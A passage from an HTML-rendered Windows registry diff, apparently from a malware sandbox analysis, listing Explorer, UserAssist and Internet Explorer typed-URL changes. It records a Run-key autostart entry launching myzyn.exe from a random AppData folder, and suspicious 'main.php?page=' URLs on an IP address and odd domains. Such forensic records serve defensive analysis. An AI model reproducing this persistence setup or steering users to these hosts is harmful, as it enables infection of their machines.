<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,10,00,2a,00,c6,03,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1c,00,22,00,04,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000007</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,ab,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,50,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">LoadTime</span></td>
<td><span style="color: black; font-size: xx-small;">dword:0000000c</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000009</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</span></td>
<td><span style="color: black; font-size: xx-small;">Orimdie</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached</span></td>
<td><span style="color: black; font-size: xx-small;">{2559A1F4-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,50,d3,6d,14,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,e0,c1,39,09,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached</span></td>
<td><span style="color: black; font-size: xx-small;">{2559A1F5-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,20,bf,84,14,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,00,f8,1e,0a,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU</span></td>
<td><span style="color: black; font-size: xx-small;">NodeSlots</span></td>
<td><span style="color: black; font-size: xx-small;">hex:02,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:02,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU</span></td>
<td><span style="color: black; font-size: xx-small;">MRUListEx</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,ff,ff,ff,ff,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,00,00,00,00,ff,ff,ff,ff,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU</span></td>
<td><span style="color: black; font-size: xx-small;">1</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:14,00,1f,48,ba,8f,0d,45,25,ad,d0,11,98,a8,08,00,36,1b,11,03,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1</span></td>
<td><span style="color: black; font-size: xx-small;">NodeSlot</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1</span></td>
<td><span style="color: black; font-size: xx-small;">MRUListEx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:ff,ff,ff,ff,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\2</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell</span></td>
<td><span style="color: black; font-size: xx-small;">FolderType</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"MyDocuments"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@explorer.exe,-7004</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Opens your Internet browser."</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url1</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.google.com/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://46.249.59.116/main.php?page=5a56c997ffff2f79"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url2</span></td>
<td><span style="color: black; font-size: xx-small;">"http://google.com/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.google.com/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url3</span></td>
<td><span style="color: black; font-size: xx-small;">"http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://ns8.ns360.info/main.php?page=f61d19dee2176c62"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url4</span></td>
<td><span style="color: black; font-size: xx-small;">"http://urlquery.net/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url5</span></td>
<td><span style="color: black; font-size: xx-small;">"http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://urlquery.net/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url6</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://google.com/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url7</span></td>
<td><span style="color: black; font-size: xx-small;">"http://oldversion.com/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url8</span></td>
<td><span style="color: black; font-size: xx-small;">"http://go.microsoft.com/fwlink/?LinkId=69157"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url9</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://oldversion.com/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url10</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://go.microsoft.com/fwlink/?LinkId=69157"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\DropDown</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Health</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{0890F930-4F80-4646-BAB1-4B6E5571FB89}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{1F32514F-1561-4922-A604-8A1F478B5A42}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{52903d79-f993-4de6-8317-20c9c176d823}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{59E7BF52-E5C9-4382-A39A-522DEE9AFDFD}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}</span></td>
<td><span style="color: black; font-size: xx-small;">AttemptedAutoRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{5F4BB5C9-4652-489B-8601-EEC0C3C32E2E}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{7F2B1D6B-1357-402C-A1C8-67E59583B41D}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{93075F62-16B3-43EC-A53B-FFAD0E01D5E7}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,0d,00,00,00,b0,f7,ed,18,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,11,00,00,00,00,91,ad,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5\VafgnyyEvgr.yax</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,60,0a,ac,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,00,91,ad,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\Cebtenz Svyrf\Rcfvyba Fdhnerq\VafgnyyEvgr\VafgnyyEvgr.rkr</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,50,e8,07,19,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,90,71,d8,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:::{2559N1S4-21Q7-11Q4-OQNS-00P04S60O9S0}</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,07,00,00,00,b0,e4,6a,a6,dd,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,70,7b,f1,4e,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:%pfvqy2%\Jverfunex.yax</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,06,00,00,00,a0,58,5d,5d,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,06,00,00,00,00,71,80,5d,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Type</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Flags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,21,00,3a,00,fb,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Type</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Flags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,94,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Type</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Flags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">LoadTime</span></td>
<td><span style="color: black; font-size: xx-small;">dword:0000000c</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000009</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections</span></td>
<td><span style="color: black; font-size: xx-small;">SavedLegacySettings</span></td>
<td><span style="color: black; font-size: xx-small;">hex:46,00,00,00,10,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:46,00,00,00,21,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Run</span></td>
<td><span style="color: black; font-size: xx-small;">Orimdie</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached</span></td>
<td><span style="color: black; font-size: xx-small;">{2559A1F4-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,50,d3,6d,14,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,e0,c1,39,09,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached</span></td>
<td><span style="color: black; font-size: xx-small;">{2559A1F5-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401</span></td>
